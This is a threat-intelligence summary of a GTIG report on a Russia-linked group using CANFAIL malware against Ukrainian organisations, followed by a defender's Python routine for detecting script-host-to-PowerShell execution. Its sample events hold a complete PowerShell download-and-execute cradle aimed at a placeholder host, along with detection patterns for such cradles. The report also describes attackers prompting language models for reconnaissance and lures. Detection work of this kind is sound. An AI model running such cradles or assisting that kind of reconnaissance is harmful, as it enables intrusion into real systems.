According to Google Threat Intelligence Group (GTIG), a previously undocumented threat actor has been linked to attacks on Ukrainian organisations using the CANFAIL malware. GTIG describes the group as possibly affiliated with Russian intelligence services and notes that its targets include defence, military, government, and energy organisations within Ukrainian regional and national governments.
The threat actor has shown growing interest in aerospace organisations, manufacturing firms with military or drone ties, nuclear and chemical research bodies, and international organisations aiding Ukraine, GTIG added. GTIG says the group is prompting large language models to conduct reconnaissance, craft social-engineering lures, and support post-compromise activity and C2 infrastructure.
Recent phishing campaigns have impersonated legitimate national and local Ukrainian energy organisations to gain unauthorised access to organisational and personal email accounts. CANFAIL is obfuscated JavaScript malware that downloads and executes a PowerShell script, which in turn delivers a memory-only PowerShell dropper; the attack chains also deliver a RAR archive via embedded Google Drive links.
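As an added defender's example (not code from the GTIG report), the following triage routine runs over constructed Sysmon-style process-creation events and flags the execution pattern described above: a Windows script host (the stage where obfuscated JavaScript would run) launching PowerShell with download-cradle, in-memory execution or encoded-command indicators. The field names, paths and events are constructed for illustration, not real telemetry.

```python
import re

# Constructed Sysmon Event ID 1 style records (assumed field names), not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/stage.ps1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc BASE64PLACEHOLDER"},
]

# Parents that indicate a JScript/VBScript/HTA stage handed off to PowerShell.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")

# Command-line indicators of a download cradle, in-memory execution or encoding.
CRADLE_PATTERNS = [
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
]


def classify(event):
    """Return the list of reasons an event resembles a script-host-to-PowerShell stage."""
    reasons = []
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return reasons
    if parent in SCRIPT_HOSTS:
        reasons.append(f"powershell spawned by script host {parent}")
    for pat in CRADLE_PATTERNS:
        if pat.search(event["CommandLine"]):
            reasons.append(f"cmdline matches {pat.pattern}")
    return reasons


def triage(events):
    """Flag events with a script-host parent plus at least one cradle/obfuscation indicator."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if any("script host" in r for r in reasons) and len(reasons) >= 2:
            hits.append((ev["CommandLine"], reasons))
    return hits
```

Requiring both the script-host parent and a command-line indicator keeps ordinary administrative PowerShell launched from Explorer or a scheduler out of the alert queue.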